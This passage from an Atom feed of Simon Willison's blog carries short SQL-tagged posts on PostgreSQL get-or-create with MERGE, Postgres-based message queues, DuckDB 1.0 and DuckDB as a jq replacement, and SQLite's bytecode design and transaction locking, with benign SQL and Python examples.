&lt;strong&gt;&lt;a href="https://github.com/datasette/datasette-checkbox/releases/tag/0.1a2"&gt;datasette-checkbox 0.1a2&lt;/a&gt;&lt;/strong&gt; - 2024-08-16&lt;br /&gt;Add interactive checkboxes to columns in Datasette&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://github.com/simonw/datasette/releases/tag/1.0a15"&gt;datasette 1.0a15&lt;/a&gt;&lt;/strong&gt; - 2024-08-16&lt;br /&gt;An open source multi-tool for exploring and publishing data&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://github.com/simonw/asgi-csrf/releases/tag/0.10"&gt;asgi-csrf 0.10&lt;/a&gt;&lt;/strong&gt; - 2024-08-15&lt;br /&gt;ASGI middleware for protecting against CSRF attacks&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://github.com/datasette/datasette-pins/releases/tag/0.1a3"&gt;datasette-pins 0.1a3&lt;/a&gt;&lt;/strong&gt; - 2024-08-07&lt;br /&gt;Pin databases, tables, and other items to the Datasette homepage&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://github.com/simonw/django-http-debug/releases/tag/0.2"&gt;django-http-debug 0.2&lt;/a&gt;&lt;/strong&gt; - 2024-08-07&lt;br /&gt;Django app for creating endpoints that log incoming request and return mock data&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id="tils"&gt;TILs&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://til.simonwillison.net/sqlite/sqlite-vec"&gt;Using sqlite-vec with embeddings in sqlite-utils and Datasette&lt;/a&gt; - 2024-08-11&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://til.simonwillison.net/django/pytest-django"&gt;Using pytest-django with a reusable Django application&lt;/a&gt; - 2024-08-07&lt;/li&gt;
&lt;/ul&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/performance"&gt;performance&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/datasette"&gt;datasette&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/weeknotes"&gt;weeknotes&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="performance"/><category term="sql"/><category term="sqlite"/><category term="datasette"/><category term="weeknotes"/></entry><entry><title>How to Get or Create in PostgreSQL</title><link href="https://simonwillison.net/2024/Aug/5/how-to-get-or-create-in-postgresql/#atom-tag" rel="alternate"/><published>2024-08-05T15:15:30+00:00</published><updated>2024-08-05T15:15:30+00:00</updated><id>https://simonwillison.net/2024/Aug/5/how-to-get-or-create-in-postgresql/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://hakibenita.com/postgresql-get-or-create"&gt;How to Get or Create in PostgreSQL&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Get or create - for example to retrieve an existing tag record from a database table if it already exists or insert it if it doesn’t - is a surprisingly difficult operation.&lt;/p&gt;
&lt;p&gt;Haki Benita uses it to illustrate a variety of interesting PostgreSQL concepts.&lt;/p&gt;
&lt;p&gt;New to me: the pattern of running &lt;code&gt;INSERT INTO tags (name) VALUES (tag_name) RETURNING *;&lt;/code&gt;, catching the constraint violation and returning the existing record instead has a disadvantage at scale: “The table contains a dead tuple for every attempt to insert a tag that already existed” - so until vacuum runs you can end up with significant table bloat!&lt;/p&gt;
&lt;p&gt;Haki’s conclusion is that the best solution relies on a feature &lt;a href="https://git.postgresql.org/gitweb/?p=postgresql.git;a=commitdiff;h=c649fa24a42ba89bf5460c7110e4fc8eeca65959"&gt;coming in PostgreSQL 17&lt;/a&gt;: the ability to combine the &lt;a href="https://www.postgresql.org/docs/current/sql-merge.html"&gt;MERGE operation&lt;/a&gt; with a RETURNING clause:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;WITH new_tags AS (
    MERGE INTO tags
    USING (VALUES ('B'), ('C')) AS t(name)
    ON tags.name = t.name
    WHEN NOT MATCHED THEN
        INSERT (name) VALUES (t.name)
    RETURNING *
)
SELECT * FROM tags WHERE name IN ('B', 'C')
    UNION ALL
SELECT * FROM new_tags;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I wonder what the best pattern for this in SQLite is. Could it be as simple as this?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;INSERT OR IGNORE INTO tags (name) VALUES ('B'), ('C');
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The SQLite &lt;a href="https://www.sqlite.org/lang_insert.html"&gt;INSERT documentation&lt;/a&gt; doesn't currently provide extensive details for &lt;code&gt;INSERT OR IGNORE&lt;/code&gt;, but there are some hints &lt;a href="https://sqlite.org/forum/forumpost/f13dc431f9f3e669"&gt;in this forum thread&lt;/a&gt;. &lt;a href="https://hoelz.ro/blog/with-sqlite-insert-or-ignore-is-often-not-what-you-want"&gt;This post&lt;/a&gt; by Rob Hoelz points out that &lt;code&gt;INSERT OR IGNORE&lt;/code&gt; will silently ignore &lt;em&gt;any&lt;/em&gt; constraint violation, so &lt;code&gt;INSERT INTO tags (tag) VALUES ('C'), ('D') ON CONFLICT(tag) DO NOTHING&lt;/code&gt; may be a better option.

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://news.ycombinator.com/item?id=41159797"&gt;Hacker News&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/postgresql"&gt;postgresql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/haki-benita"&gt;haki-benita&lt;/a&gt;&lt;/p&gt;



</summary><category term="postgresql"/><category term="sql"/><category term="sqlite"/><category term="haki-benita"/></entry><entry><title>Build your own SQS or Kafka with Postgres</title><link href="https://simonwillison.net/2024/Jul/31/sqs-or-kafka-with-postgres/#atom-tag" rel="alternate"/><published>2024-07-31T17:34:54+00:00</published><updated>2024-07-31T17:34:54+00:00</updated><id>https://simonwillison.net/2024/Jul/31/sqs-or-kafka-with-postgres/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://blog.sequinstream.com/build-your-own-sqs-or-kafka-with-postgres/"&gt;Build your own SQS or Kafka with Postgres&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Anthony Accomazzo works on &lt;a href="https://github.com/sequinstream/sequin"&gt;Sequin&lt;/a&gt;, an open source "message stream" (similar to Kafka) written in Elixir and Go on top of PostgreSQL.&lt;/p&gt;
&lt;p&gt;This detailed article describes how you can implement message queue patterns on PostgreSQL from scratch, including this neat example using a CTE, &lt;code&gt;returning&lt;/code&gt; and &lt;code&gt;for update skip locked&lt;/code&gt; to retrieve &lt;code&gt;$1&lt;/code&gt; messages from the &lt;code&gt;messages&lt;/code&gt; table and simultaneously mark them with &lt;code&gt;not_visible_until&lt;/code&gt; set to &lt;code&gt;$2&lt;/code&gt; in order to "lock" them for processing by a client:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;with available_messages as (
  select seq
  from messages
  where not_visible_until is null
    or (not_visible_until &amp;lt;= now())
  order by inserted_at
  limit $1
  for update skip locked
)
update messages m
set
  not_visible_until = $2,
  deliver_count = deliver_count + 1,
  last_delivered_at = now(),
  updated_at = now()
from available_messages am
where m.seq = am.seq
returning m.seq, m.data;
&lt;/code&gt;&lt;/pre&gt;

    &lt;p&gt;&lt;small&gt;Via &lt;a href="https://lobste.rs/s/ap6qvh/build_your_own_sqs_kafka_with_postgres"&gt;lobste.rs&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/message-queues"&gt;message-queues&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/postgresql"&gt;postgresql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqs"&gt;sqs&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/kafka"&gt;kafka&lt;/a&gt;&lt;/p&gt;



</summary><category term="message-queues"/><category term="postgresql"/><category term="sql"/><category term="sqs"/><category term="kafka"/></entry><entry><title>DuckDB 1.0</title><link href="https://simonwillison.net/2024/Jun/3/duckdb-10/#atom-tag" rel="alternate"/><published>2024-06-03T13:23:50+00:00</published><updated>2024-06-03T13:23:50+00:00</updated><id>https://simonwillison.net/2024/Jun/3/duckdb-10/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://duckdb.org/2024/06/03/announcing-duckdb-100"&gt;DuckDB 1.0&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Six years in the making. The most significant feature in this milestone is stability of the file format: previous releases often required files to be upgraded to work with the new version.&lt;/p&gt;

&lt;p&gt;This release also aspires to provide stability for both the SQL dialect and the C API, though these may still change with sufficient warning in the future.&lt;/p&gt;

    &lt;p&gt;&lt;small&gt;Via &lt;a href="https://twitter.com/duckdb/status/1797619191341551969"&gt;@duckdb&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/databases"&gt;databases&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/duckdb"&gt;duckdb&lt;/a&gt;&lt;/p&gt;



</summary><category term="databases"/><category term="sql"/><category term="duckdb"/></entry><entry><title>Why SQLite Uses Bytecode</title><link href="https://simonwillison.net/2024/Apr/30/why-sqlite-uses-bytecode/#atom-tag" rel="alternate"/><published>2024-04-30T05:32:54+00:00</published><updated>2024-04-30T05:32:54+00:00</updated><id>https://simonwillison.net/2024/Apr/30/why-sqlite-uses-bytecode/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://sqlite.org/draft/whybytecode.html"&gt;Why SQLite Uses Bytecode&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Brand new SQLite architecture documentation by D. Richard Hipp explaining the trade-offs between a bytecode-based query plan and a tree of objects.&lt;/p&gt;

&lt;p&gt;SQLite uses the bytecode approach, which has an important benefit: SQLite can very easily execute queries incrementally, stopping after each row, for example. This is more useful for a local library database than for a network server, where the assumption is that the entire query will be executed before results are returned over the wire.&lt;/p&gt;

    &lt;p&gt;&lt;small&gt;Via &lt;a href="https://twitter.com/DRichardHipp/status/1785037995101290772"&gt;@DRichardHipp&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/databases"&gt;databases&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/d-richard-hipp"&gt;d-richard-hipp&lt;/a&gt;&lt;/p&gt;



</summary><category term="databases"/><category term="sql"/><category term="sqlite"/><category term="d-richard-hipp"/></entry><entry><title>Optimizing SQLite for servers</title><link href="https://simonwillison.net/2024/Mar/31/optimizing-sqlite-for-servers/#atom-tag" rel="alternate"/><published>2024-03-31T20:16:23+00:00</published><updated>2024-03-31T20:16:23+00:00</updated><id>https://simonwillison.net/2024/Mar/31/optimizing-sqlite-for-servers/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://kerkour.com/sqlite-for-servers"&gt;Optimizing SQLite for servers&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Sylvain Kerkour's comprehensive set of lessons learned running SQLite for server-based applications.&lt;/p&gt;
&lt;p&gt;There's a lot of useful stuff in here, including detailed coverage of the different recommended &lt;code&gt;PRAGMA&lt;/code&gt; settings.&lt;/p&gt;
&lt;p&gt;There was also a tip I haven't seen before about &lt;code&gt;BEGIN IMMEDIATE&lt;/code&gt; transactions:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;By default, SQLite starts transactions in &lt;code&gt;DEFERRED&lt;/code&gt; mode: they are considered read only. They are upgraded to a write transaction that requires a database lock in-flight, when query containing a write/update/delete statement is issued.&lt;/p&gt;
&lt;p&gt;The problem is that by upgrading a transaction after it has started, SQLite will immediately return a &lt;code&gt;SQLITE_BUSY&lt;/code&gt; error without respecting the &lt;code&gt;busy_timeout&lt;/code&gt; previously mentioned, if the database is already locked by another connection.&lt;/p&gt;
&lt;p&gt;This is why you should start your transactions with &lt;code&gt;BEGIN IMMEDIATE&lt;/code&gt; instead of only &lt;code&gt;BEGIN&lt;/code&gt;. If the database is locked when the transaction starts, SQLite will respect &lt;code&gt;busy_timeout&lt;/code&gt;.&lt;/p&gt;
&lt;/blockquote&gt;

    &lt;p&gt;&lt;small&gt;Via &lt;a href="https://lobste.rs/s/rsagpv/sqlite_for_servers"&gt;lobste.rs&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/databases"&gt;databases&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/performance"&gt;performance&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite-busy"&gt;sqlite-busy&lt;/a&gt;&lt;/p&gt;



</summary><category term="databases"/><category term="performance"/><category term="sql"/><category term="sqlite"/><category term="sqlite-busy"/></entry><entry><title>Quoting Seth Rosen</title><link href="https://simonwillison.net/2024/Mar/25/seth-rosen/#atom-tag" rel="alternate"/><published>2024-03-25T23:33:26+00:00</published><updated>2024-03-25T23:33:26+00:00</updated><id>https://simonwillison.net/2024/Mar/25/seth-rosen/#atom-tag</id><summary type="html">
    &lt;blockquote cite="https://twitter.com/sethrosen/status/1252291581320757249"&gt;&lt;p&gt;Them: Can you just quickly pull this data for me?&lt;/p&gt;
&lt;p&gt;Me: Sure, let me just: &lt;/p&gt;
&lt;p&gt;SELECT * FROM some_ideal_clean_and_pristine.table_that_you_think_exists&lt;/p&gt;&lt;/blockquote&gt;
&lt;p class="cite"&gt;&amp;mdash; &lt;a href="https://twitter.com/sethrosen/status/1252291581320757249"&gt;Seth Rosen&lt;/a&gt;&lt;/p&gt;

    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/analytics"&gt;analytics&lt;/a&gt;&lt;/p&gt;



</summary><category term="sql"/><category term="analytics"/></entry><entry><title>DuckDB as the New jq</title><link href="https://simonwillison.net/2024/Mar/21/duckdb-as-the-new-jq/#atom-tag" rel="alternate"/><published>2024-03-21T20:36:20+00:00</published><updated>2024-03-21T20:36:20+00:00</updated><id>https://simonwillison.net/2024/Mar/21/duckdb-as-the-new-jq/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://www.pgrs.net/2024/03/21/duckdb-as-the-new-jq/"&gt;DuckDB as the New jq&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The DuckDB CLI tool can query JSON files directly, making it a surprisingly effective replacement for jq. Paul Gross demonstrates the following query:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;select license-&amp;gt;&amp;gt;'key' as license, count(*) from 'repos.json' group by 1&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;repos.json&lt;/code&gt; contains an array of &lt;code&gt;{"license": {"key": "apache-2.0"}..}&lt;/code&gt; objects. This example query shows counts for each of those licenses.&lt;/p&gt;
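&lt;p&gt;For comparison, here is roughly the same grouping written in plain Python. This is only a sketch of what the query computes, not how DuckDB runs it, and the inline sample data is made up to stand in for &lt;code&gt;repos.json&lt;/code&gt;:&lt;/p&gt;

```python
import json
from collections import Counter

# Made-up sample standing in for the contents of repos.json
sample = """
[
  {"license": {"key": "apache-2.0"}},
  {"license": {"key": "mit"}},
  {"license": {"key": "apache-2.0"}},
  {"license": null}
]
"""
repos = json.loads(sample)

# Group by the license key, treating a missing or null license as None
counts = Counter((repo.get("license") or {}).get("key") for repo in repos)

for license_key, total in counts.most_common():
    print(license_key, total)
```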

    &lt;p&gt;&lt;small&gt;Via &lt;a href="https://lobste.rs/s/x5immj/duckdb_as_new_jq"&gt;lobste.rs&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/cli"&gt;cli&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/jq"&gt;jq&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/duckdb"&gt;duckdb&lt;/a&gt;&lt;/p&gt;



</summary><category term="cli"/><category term="sql"/><category term="jq"/><category term="duckdb"/></entry></feed>